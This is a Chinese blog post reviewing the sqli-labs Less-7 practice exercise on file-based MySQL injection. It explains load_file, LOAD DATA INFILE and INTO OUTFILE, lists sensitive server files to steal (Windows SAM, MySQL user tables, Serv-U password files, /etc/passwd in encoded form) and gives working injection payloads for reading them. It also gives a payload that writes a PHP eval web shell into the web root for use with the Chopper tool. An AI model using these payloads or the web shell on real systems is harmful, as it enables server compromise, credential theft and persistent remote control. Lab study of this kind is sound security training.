Sqli-labs 复习 Less07 文件型注入 - GET

最新推荐文章于 2023-01-05 21:52:50 发布
最新推荐文章于 2023-01-05 21:52:50 发布
阅读量462 收藏 4
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81592478
版权

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

文件型注入

函数讲解

1. load_file()导出文件

  1. 简介

     load_file(file_name): 读取文件并返回该文件的内容作为一个字符串。

  2. 使用条件

    1. 必须有权限读取并且文件必须完全可读

      and (select count() from mysql.user)>0/ 如果结果返回正常,说明具有读写权限。
      and (select count() from mysql.user)>0/ 返回错误,应该是管理员给数据库帐户降权

    2. 欲读取文件必须在服务器上

    3. 必须指定文件完整的路径

    4. 欲读取文件必须小于 max_allowed_packet

      如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到只有 administrators 才能访问的文件,users 就别想 load_file 出来。

  3. 在实际的注入中,我们有两个难点需要解决

    1. 绝对物理路径
    2. 构造有效的畸形语句(报错爆出绝对路径)

    在很多 PHP 程序中,当提交一个错误的 Query,如果 display_errors = on,程序就会暴露 WEB 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务器的安全将受到严重的威胁。

  4. MySQL注入load_file常用路径

    WINDOWS下:

     c:/boot.ini 										//查看系统版本
 c:/windows/php.ini 									//php配置信息
 c:/windows/my.ini 									//MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
 c:/winnt/php.ini
 c:/winnt/my.ini
 c:\mysql\data\mysql\user.MYD 						//存储了mysql.user表中的数据库连接密码
 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini	//存储了虚拟主机网站路径和密码
 c:\Program Files\Serv-U\ServUDaemon.ini
 c:\windows\system32\inetsrv\MetaBase.xml			//查看IIS的虚拟主机配置
 c:\windows\repair\sam								//存储了WINDOWS系统初次安装的密码
 c:\Program Files\ Serv-U\ServUAdmin.exe				//6.0版本以前的serv-u管理员密码存储于此
 c:\Program Files\RhinoSoft.com\ServUDaemon.exe		
 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件											//存储了pcAnywhere的登陆密码
 c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf											//查看WINDOWS系统apache文件
 c:/Resin-3.0.14/conf/resin.conf						//查看jsp开发的网站 resin												//文件配置信息.
 c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf	//查看linux系统配置的JSP虚拟主机
 d:\APACHE\Apache2\conf\httpd.conf
 C:\Program Files\mysql\my.ini
 C:\mysql\data\mysql\user.MYD						//存在MYSQL系统中的用户密码

    LUNIX/UNIX 下:

     /usr/local/app/apache2/conf/httpd.conf 				//apache2缺省配置文件
 /usr/local/apache2/conf/httpd.conf
 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
 /usr/local/app/php5/lib/php.ini 					//PHP相关设置
 /etc/sysconfig/iptables 							//从中得到防火墙规则策略
 /etc/httpd/conf/httpd.conf 							// apache配置文件
 /etc/rsyncd.conf 									//同步程序配置文件
 /etc/my.cnf 										//mysql的配置文件
 /etc/redhat-release									//系统版本
 /etc/issue
 /etc/issue.net
 /usr/local/app/php5/lib/php.ini 					//PHP相关设置
 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
 /etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf //查看linux APACHE虚拟主机配置文件
 /usr/local/resin-3.0.22/conf/resin.conf 				//针对3.0.22的RESIN配置文件查看
 /usr/local/resin-pro-3.0.22/conf/resin.conf 			//针对3.0.22的RESIN配置文件查看
 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf 	//APASHE虚拟主机查看
 /etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf //查看linux APACHE虚拟主机配置文件
 /usr/local/resin-3.0.22/conf/resin.conf 				//针对3.0.22的RESIN配置文件查看
 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf	//APASHE虚拟主机查看
 /etc/sysconfig/iptables								//查看防火墙策略
 load_file(char(47))									//可以列出FreeBSD,Sunos系统根目录
 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
 replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

  5. 示例

     Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

    Explain:利用 hex() 将文件内容导出来,尤其是 smb 文件时可以使用。

     id=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

    Explain:"char(99,58,47,98,111,111,116,46,105,110,105)"就是"c:/boot.ini"的ASCII 代码

     id=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)

    Explain:“c:/boot.ini” 的 16 进制是 “0x633a2f626f6f742e696e69”

     id=-1 union select 1,1,1,load_file(c:\\boot.ini)

    Explain:路径里的 / 用 \ 代替

2. 文件导入到数据库

  1. 简介

    LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行,并装入一个表中。文件名称必须为一个文字字符串。

    在这里插入图片描述

    在注入过程中,我们往往需要一些特殊的文件,比如配置文件,密码文件等。当你具有数据库的权限时,可以将系统文件利用 load data infile 导入到数据库中。

    函数具体介绍:对于参数介绍这里就不过多的赘述了,可以参考 mysql 的文档。(提醒:参考文档才是最佳的学习资料)

    示例:load data infile ‘/tmp/t0.txt’ ignore into table t0 character set gbk fields terminated by '\t’lines terminated by ‘\n’

    将 /tmp/t0.txt 导入到 t0 表中,character set gbk 是字符集设置为 gbk,fields terminated by 是每一项数据之间的分隔符,lines terminated by 是行的结尾符。

    当错误代码是 2 的时候的时候,文件不存在,错误代码为 13 的时候是没有权限,可以考虑 /tmp 等文件夹。

    TIPS:我们从 mysql5.7 的文档看到添加了 load xml 函数,是否依旧能够用来做注入还需要验证。

3. 导入到文件

  1. 简介

     SELECT.....INTO OUTFILE 'file_name'

    可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有 FILE 权限,才能使用此语法。file_name 不能是一个已经存在的文件。

  2. 一般有两种利用形式

    1. 第一种直接将 select 内容导入到文件中

       Select version() into outfile "c:\\phpnow\\htdocs\\test.php"

      此处将 version() 替换成一句话,<?php @eval($_post["mima"])?> 也即

       Select <?php @eval($_post["mima"])?> into outfile "c:\\phpnow\\htdocs\\test.php"

      直接连接一句话就可以了,其实在select 内容中不仅仅是可以上传一句话的,也可以上传很多的内容。

    2. 第二种修改文件结尾

       Select version() Into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16 进制文件

      解释:通常是用 ‘\r\n’ 结尾,此处我们修改为自己想要的任何文件。同时可以用FIELDSTERMINATED BY

      16 进制可以为一句话或者其他任何的代码,可自行构造。在sqlmap 中os-shell 采取的就是这样的方式, sqlmap os shell 解析链接:http://www.cnblogs.com/lcamry/p/5505110.html

  3. 需要注意的

    1. 可能在文件路径当中要注意转义,这个要看具体的环境

    2. 上述我们提到了load_file(),但是当前台无法导出数据的时候,我们可以利用下面的语句

       select load_file('c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini')into outfile 'c:\\wamp\\www\\test.php'

      可以利用该语句将服务器当中的内容导入到 web 服务器下的目录,这样就可以得到数据了。上述 my.ini 当中存在 password 项(不过默认被注释),当然会有很多的内容可以被导出来,这个要平时积累。

注入方法

  1. 测试

    ?id=-1’)) or 1=1–+

  2. 读文件

    前提条件:

    1. 当前权限对该文件可读
    2. 文件在该服务器上
    3. 路径完整
    4. 文件大小小于 max_allowed_packet
    5. 当前数据库用户有 FILE 权限
    6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作

    测试 payload

     正常导入:
 
 ?id=-1' union select 1,2,load_file('/etc/php5/apache2/php.ini')--+

 通过char()函数将ascii十进制形式转为字符形式,可绕过引号过滤:

 ?id=-1' union select 1,2,load_file(char(47,101,116,99,47,112,104...))--+ 

 十六进制形式导入:

 ?id=-1' union select 1,2,load_file(0x2f6574632f706870352f6170616...) 

 可用于 smb 协议:

 ?id=-1' union select 1,2,load_file('//etc/php5/apache2/php.ini')--+

 可用于 dns 隧道:

 ?id=-1' union select 1,2,load_file('\\\\etc\\php5\\apache2\\php.ini')--+

  3. 导出到文件

    前提条件

    1. 目标目录要有可写权限
    2. 当前数据库用户要有FILE权限
    3. 目标文件不能已存在
    4. secure_file_priv的值为空
    5. 路径完整
    6. outfile后的文件路径不能用十六进制或配合char()来实现,只能用引号这种形式

    写文件

     ?id=-1')) union select 1,2,3 into outfile ('/var/www/sqli-labs/less-7/uuu.txt')--+

 ?id=-1')) union select 1,2,3 into dumpfile ('/var/www/sqli-labs/less-7/uuu.txt')--+

 可写成:正常形式,ascii码形式,十六进制形式,smb协议形式,dns隧道形式

    我们可以直接将一句话木马导入进去

    ?id=1’))union select 1,2,’<?php @eval($\_post[?mima?])?>’ into outfile “/var/www/sqli-labs/less-7/test.php”–+

    可以使用菜刀连接木马

Less - 07: GET - Dump into outfile - String

  1. 测试

     ?id=-1')) or 1=1--+

  2. 导出到文件

    将查询结果导出到文件

    ?id=-1’)) union select 1,2,3 into outfile (’/var/www/sqli-labs/less-7/uuu.txt’)–+

    我们可以直接将一句话木马导入进去

    ?id=1’))union select 1,2,’<?php @eval($\_post[?mima?])?>’ into outfile “/var/www/sqli-labs/less-7/test.php”–+

    可以使用菜刀连接木马

网络安全打工人
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入】Less-7导出文件GET字符注入
Mitchell_Donovan的博客
03-30 373
Less-7导出文件GET字符注入 什么是导出文件? 1、在本实验开始的0x2 sql注入基础知识就有介绍LOAD_FILE的用法,大家可以翻回去看看!另外在构建环境之初,由于是Linux系统,对这个目录的权限控制的很严谨。 2、所以在我们的payload中只能在/home/wwwroot/default/mysql才能写入或者读取文件!因为mysql目录的权限我们设置chowm -R mysql:mysql 3、另外要保证正常的文件写入与读取要在mysql配置文件my.cnf最后一行新增secur
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2696
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
sqlilabs—less7
一个普普通通的博客
03-24 2561
sqlilabs—less7
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1634
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs ————less -7
Fly_鹏程万里
05-11 4189
Less-7打开关卡网页之后,根据提示传入参数id,数据类为numeric,之后可以看到如上的提示信息,在提示信息中给出了让我们使用outfile的提示,那么我们还是先来看看源码吧:关键sql代码:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql);可以看出这里对传入的参数id进行了...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sql注入】Less5-7详解
lyy0xfff的博客
07-13 886
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类、时间类的盲注 0x01 Less-6 Less-7 ...
sqli-labs Less-7 Dump into outfile sql注入读写文件
bigblue00的博客
06-16 1685
Less-7 Dump into outfile sql注入读写文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入读写文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
SQLi-Labs Less7-Less10
KRDecad3的博客
11-13 625
Less-7-GET-Dump into outfile-String 考查into outfile写入文件 输入id=1 输入id=1'报错 输入id=1"不报错,说明是单引号 输入id=1'--+报错,那么再试试id=1')--+还报错,再试试id=1'))--+正常,由此判断查询语句的参数是(('$_GET[id]'))的形式。 使用into outfile写入一句话: 输入id=-...
Sqli-labs--Less7-10
小人物的博客
05-22 605
Less 7 Dump into outfile 第七关,通过注入导出文件,一句话木马。 需要知道的是根目录,以及mysql中my.ini文件中的secure_file_priv,没有的话可以在my.ini中直接加入,有了这个才能导出。 payload : http://127.0.0.1/sqli-labs/Less-7/index.php?id=-1'))Union sel...
Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC
henghengzhao_的博客
10-18 1188
大白话讲解,通篇写的是我做题的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC
SQL
胖嘟嘟
07-16 661
一、基础 模式定义了数据如何存储、存储什么样的数据以及数据如何分解等信息,数据库和表都有模式。 主键的值不允许修改,也不允许复用(不能将已经删除的主键值赋给新数据行的主键)。 SQL(Structured Query Language),标准 SQL 由 ANSI 标准委员会管理,从而称为 ANSI SQL。各个 DBMS 都有自己的实现,如 PL/SQL、Transact-SQL 等。 SQL ...
网络安全-sqlmap实战之sqlilabs-Less7
关注网络安全、云原生安全
07-13 814
图Less7 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-7/?id=1" -o -dbs --batch 部分信息 时间过长,不再等待,通过信息,添加--technique和--dbms参数 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-7/?id=1"..
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1139
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值